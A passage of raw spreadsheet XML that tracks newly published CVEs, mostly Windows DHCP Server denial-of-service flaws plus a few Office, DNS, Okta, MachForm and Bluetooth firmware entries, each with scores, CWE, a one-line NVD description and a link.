      <c r="D1151" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1151" s="5" t="inlineStr"/>
      <c r="H1151" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1151" s="5" t="inlineStr"/>
      <c r="J1151" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1151" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1151" s="5" t="inlineStr"/>
      <c r="M1151" s="5" t="inlineStr"/>
      <c r="N1151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1151" s="5" t="inlineStr"/>
      <c r="Q1151" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1151" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D1152" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1152" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1152" s="5" t="inlineStr"/>
      <c r="H1152" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1152" s="5" t="inlineStr"/>
      <c r="J1152" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1152" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1152" s="5" t="inlineStr"/>
      <c r="M1152" s="5" t="inlineStr"/>
      <c r="N1152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1152" s="5" t="inlineStr"/>
      <c r="Q1152" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1152" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D1153" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1153" s="5" t="inlineStr"/>
      <c r="H1153" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1153" s="5" t="inlineStr"/>
      <c r="J1153" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1153" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1153" s="5" t="inlineStr"/>
      <c r="M1153" s="5" t="inlineStr"/>
      <c r="N1153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1153" s="5" t="inlineStr"/>
      <c r="Q1153" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1153" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D1154" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1154" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1154" s="5" t="inlineStr"/>
      <c r="H1154" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1154" s="5" t="inlineStr"/>
      <c r="J1154" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1154" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1154" s="5" t="inlineStr"/>
      <c r="M1154" s="5" t="inlineStr"/>
      <c r="N1154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1154" s="5" t="inlineStr"/>
      <c r="Q1154" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1154" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D1155" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1155" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1155" s="5" t="inlineStr"/>
      <c r="H1155" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1155" s="5" t="inlineStr"/>
      <c r="J1155" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1155" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1155" s="5" t="inlineStr"/>
      <c r="M1155" s="5" t="inlineStr"/>
      <c r="N1155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1155" s="5" t="inlineStr"/>
      <c r="Q1155" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1155" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D1156" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1156" s="5" t="inlineStr"/>
      <c r="H1156" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1156" s="5" t="inlineStr"/>
      <c r="J1156" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1156" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1156" s="5" t="inlineStr"/>
      <c r="M1156" s="5" t="inlineStr"/>
      <c r="N1156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1156" s="5" t="inlineStr"/>
      <c r="Q1156" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1156" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D1157" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1157" s="5" t="inlineStr"/>
      <c r="H1157" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1157" s="5" t="inlineStr"/>
      <c r="J1157" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1157" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1157" s="5" t="inlineStr"/>
      <c r="M1157" s="5" t="inlineStr"/>
      <c r="N1157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1157" s="5" t="inlineStr"/>
      <c r="Q1157" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1157" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D1158" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1158" s="5" t="inlineStr"/>
      <c r="H1158" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1158" s="5" t="inlineStr"/>
      <c r="J1158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1158" s="5" t="inlineStr"/>
      <c r="M1158" s="5" t="inlineStr"/>
      <c r="N1158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1158" s="5" t="inlineStr"/>
      <c r="Q1158" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1158" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D1159" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1159" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1159" s="5" t="inlineStr"/>
      <c r="H1159" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1159" s="5" t="inlineStr"/>
      <c r="J1159" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1159" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1159" s="5" t="inlineStr"/>
      <c r="M1159" s="5" t="inlineStr"/>
      <c r="N1159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1159" s="5" t="inlineStr"/>
      <c r="Q1159" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1159" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D1160" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1160" s="5" t="inlineStr"/>
      <c r="H1160" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1160" s="5" t="inlineStr"/>
      <c r="J1160" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1160" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1160" s="5" t="inlineStr"/>
      <c r="M1160" s="5" t="inlineStr"/>
      <c r="N1160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1160" s="5" t="inlineStr"/>
      <c r="Q1160" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1160" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D1161" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1161" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1161" s="5" t="inlineStr"/>
      <c r="H1161" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1161" s="5" t="inlineStr"/>
      <c r="J1161" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1161" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1161" s="5" t="inlineStr"/>
      <c r="M1161" s="5" t="inlineStr"/>
      <c r="N1161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1161" s="5" t="inlineStr"/>
      <c r="Q1161" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1161" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77898</t>
        </is>
      </c>
      <c r="D1162" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1162" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1162" s="5" t="inlineStr"/>
      <c r="H1162" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1162" s="5" t="inlineStr"/>
      <c r="J1162" s="5" t="inlineStr"/>
      <c r="K1162" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L1162" s="5" t="inlineStr"/>
      <c r="M1162" s="5" t="inlineStr"/>
      <c r="N1162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1162" s="5" t="inlineStr"/>
      <c r="Q1162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="D1163" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1163" s="5" t="inlineStr"/>
      <c r="H1163" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1163" s="5" t="inlineStr"/>
      <c r="J1163" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1163" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1163" s="5" t="inlineStr"/>
      <c r="M1163" s="5" t="inlineStr"/>
      <c r="N1163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1163" s="5" t="inlineStr"/>
      <c r="Q1163" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1163" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="D1164" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1164" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G1164" s="5" t="inlineStr"/>
      <c r="H1164" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1164" s="5" t="inlineStr"/>
      <c r="J1164" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K1164" s="5" t="inlineStr"/>
      <c r="L1164" s="5" t="inlineStr"/>
      <c r="M1164" s="5" t="inlineStr"/>
      <c r="N1164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1164" s="5" t="inlineStr"/>
      <c r="Q1164" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R1164"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S1164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78837</t>
        </is>
      </c>
      <c r="D1165" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1165" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1165" s="5" t="inlineStr"/>
      <c r="H1165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1165" s="5" t="inlineStr"/>
      <c r="J1165" s="5" t="inlineStr"/>
      <c r="K1165" s="5" t="inlineStr"/>
      <c r="L1165" s="5" t="inlineStr"/>
      <c r="M1165" s="5" t="inlineStr"/>
      <c r="N1165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1165" s="5" t="inlineStr"/>
      <c r="Q1165" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1165" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="S1165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79377</t>
        </is>
      </c>
      <c r="D1166" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1166" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1166" s="5" t="inlineStr"/>
      <c r="H1166" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1166" s="5" t="inlineStr"/>
      <c r="J1166" s="5" t="inlineStr"/>
      <c r="K1166" s="5" t="inlineStr"/>
      <c r="L1166" s="5" t="inlineStr"/>
      <c r="M1166" s="5" t="inlineStr"/>
      <c r="N1166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1166" s="5" t="inlineStr"/>
      <c r="Q1166" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1166" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="S1166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79378</t>
        </is>
      </c>
      <c r="D1167" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1167" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
